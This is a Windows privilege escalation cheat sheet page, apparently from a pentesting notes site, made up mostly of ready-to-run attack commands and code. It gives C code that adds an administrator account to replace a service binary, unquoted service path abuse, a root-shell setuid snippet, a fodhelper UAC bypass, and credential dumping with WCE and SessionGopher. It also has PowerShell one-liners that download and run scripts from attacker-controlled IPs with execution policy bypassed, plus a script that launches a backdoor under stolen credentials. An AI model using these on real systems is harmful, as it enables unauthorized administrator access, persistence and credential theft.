# Windows Escalation

{% hint style="info" %}
PowerUp is a good first hit for privesc<br>
{% endhint %}

### **New user:**

Imagine we have a program that uses a file with system privs. And the program lets us r/w to the file. We can replace the file and then relaunch the program and get our new file to execute:\
\>`icacls ServiioService.exe` //see that the file is NTAuth\
make a c file called **useradd.c**

```python
#include /* system, NULL, EXIT_FAILURE */
int main (){
int i;
i = system ("net user evil Ev!lpass /add");
i = system ("net localgroup administrators evil /add");
return 0;
}
```

\
then convert to exe\
\> `i686-w64-mingw32-gcc -o scsiaccess.exe useradd`.c\
\> `move "C:\Program Files\Serviio\bin\ServiioService.exe" "C:\Program Files\Serviio\bin\ServiioService_original.exe"`\
\> `net stop Serviio`\
\>`wmic service where caption="Serviio" get name, caption, state, startmode`\
\>`shutdown /r /t 0`\
\>`net localgroup Administrators` //should see our user "evil"\
\
\
**Batch scripts (.bat):**\
This is a legacy windows scripting language. It has since been overshadowed by VBS and Powershell. However it still works just fine and is easy to use. A sample Batch script to open cmd:\
`START cmd.exe`

Learn more at

{% embed url="<https://www.tutorialspoint.com/batch_script/index.htm>" %}

**Unquoted Paths:**\
Such as C:\Program Files\My Program\My Service\service.exe. Will attempt to run an executable from the following paths:(anything in green could be created and would work)\
C:\Program.exe\
C:\Program Files\My.exe\
C:\Program Files\My Program\My.exe\
C:\Program Files\My Program\My service\service.exe\
\
\
USBPcap:\
\>`driverquery /v` //shows USBPcap as a driver\
\# `searchsploit USBPcap`\
`C:\Program Files\USBPcap> type USBPcap.inf` //ching if version matches searchsploit\
//we then compile it for windows and run it<br>

## Manual

System info:(or sysinfo)

> systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"

List Processes:

> tasklist /SVC

Network Info:

> ipconfig /all route print netstat -ano

Firewall:

> netsh advfirewall show currentprofile netsh advfirewall firewall show rule name=all

Scheduled tasks:

> schtasks /query /fo LIST /v

Installed apps and patch levels:

> wmic product get name, version, vendor wmic qfe get Caption, Description, HotFixID, InstalledOn

Read/write files:

> accesschk.exe -uws "Everyone" "C:\Program Files"

> powershell Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$\_.AccessToString -match "Everyone\sAllow\s\sModify"}

Mounted Disks:

> mountvol

driver enum:

> powershell driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object ‘Display Name’, ‘Start Mode’, Path Get-WmiObject Win32\_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$\_.DeviceName -like "*VMware*"}

Fast privesc checks:(looking to see if these are enabled//set to 1)

> reg query HKEY\_CURRENT\_USER\Software\Policies\Microsoft\Windows\Installer reg query HKEY\_LOCAL\_MACHINE\Software\Policies\Microsoft\Windows\Installer

Check enabled services:

> net start or wmic services where 'Caption like "Remote%" and started=true' get Caption

`reg query HKEY_CURRENT_USER\Software\Administrator\WinSCP`<br>

## more

Powershell grab and run a ps1 file:\
PS>`IEX (New-Object Net.WebClient).downloadString('http://10.10.14.20:8888/Sherlock.ps1')`\
\
or remote(might have to url encode if you do it from the browser):\
\
`C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString(‘http://IP:80/ms16032.ps1')"`\
\
//great priv esc sheet\
<https://www.puckiestyle.nl/windows-privilege-escalation/>\
\
**Unquoted service path:**\
If we see a job or command being used that is unquoted and has spaces then we can place a file there that get gabbed first.\
ex:\
`c:\Program Files (x86)\Canon\IJ Scan Utility\SETEVENT.exe`\
We can then either do an exploit at Program.exe or IJ.exe\
\
Search for unquoted service paths:\
\>`wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """`\
\
//manual check for an unquoted service path by checking the service itself\
\>`sc qc <service name>`<br>

## run file as another user

Run file as another user with powershell.\
`echo $username = '<username>' > runas.ps1`\
`echo $securePassword = ConvertTo-SecureString "<password>" -AsPlainText -Force >> runas.ps1`\
`echo $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword >> runas.ps1`\
`echo Start-Process C:\Users\User\AppData\Local\Temp\backdoor.exe -Credential $credential >> runas.ps1`

## Service hijack

powerUp and msf can do this

If we can write to the service binary directory

## Adding Users/Groups

### **Adding a RDP group:**

`#net localgroup "Remote Desktop Users" <username> /add`\
\
**Adding admin group:**\
`#net localgroup "Administrators" <username> /add`\
\
**Groups:**\
TelnetClients\
Remote Desktop Users\
Administrators

## Set User ID

`int main(void){`\
`setresuid(0, 0, 0);`\
`system("/bin/bash");`\
`}`\
\
`# Compile`\
`gcc suid.c -o suid`

## Add user

`#include <stdlib.h> /* system, NULL, EXIT_FAILURE */`

`int main () { int i; i=system ("net user /add && net localgroup administrators /add"); return 0; }`

\#Compile

`i686-w64-mingw32-gcc -o useradd.exe useradd.c`

Add a user: `net user /add`

Add a user to a group: `#net localgroup "Remote Desktop Users" /add`

## UAC Bypass

\
**Going from Admin user to Hi Integrity Admin**(able to do more commands without UAC stopping us)**:**\
//check current group\
\>`whoami /grou`ps\
//escalate then check again\
\>`powershell.exe Start-Process cmd.exe -Verb runAs`\
\
\
**Windows 10 build 1709:**\
\>`C:\Windows\System32\fodhelper.exe`\
\>`cd C:\Tools\privilege_escalation\SysinternalsSuite`\
\>`sigcheck.exe -a -m C:\Windows\System32\fodhelper.exe` //check that autoelevate is set to true\
//if so then look at pages 546-554<br>

## Pass hunting

#### wce:

Windows Credentials Editor (WCE)70 is a security tool that allows one to perform several attacks to obtain clear text passwords and hashes from a compromised Windows host. Among other things, WCE can steal NTLM credentials from memory and dump cleartext passwords stored by Windows authentication packages installed on the target system such as msv1\_0.dll, kerberos.dll, and digest.dll.

C:>`wce -w`

#### Session gopher:

A Fireeye ps1 tool to search a system for passwords like telnet, winscp, rdp, etc

//download tool to kali&#x20;

`#wget htps://raw.githubusercontent.com/fireeye/SessionGopher/master/SessionGopher.p`s1

//Set up http server to transfer file and run it on remote target&#x20;

`#python -m SimpleHTTPServer 80`

> `powershell.exe -nop -ep bypass -C iex (New-Object Net.Webclient).DownloadString('http://192.168.13.71/SessionGopher.ps1'); Invoke-SessionGopher -Thorough`


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.hackbook.io/privilege-escalation/windows-escalation.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.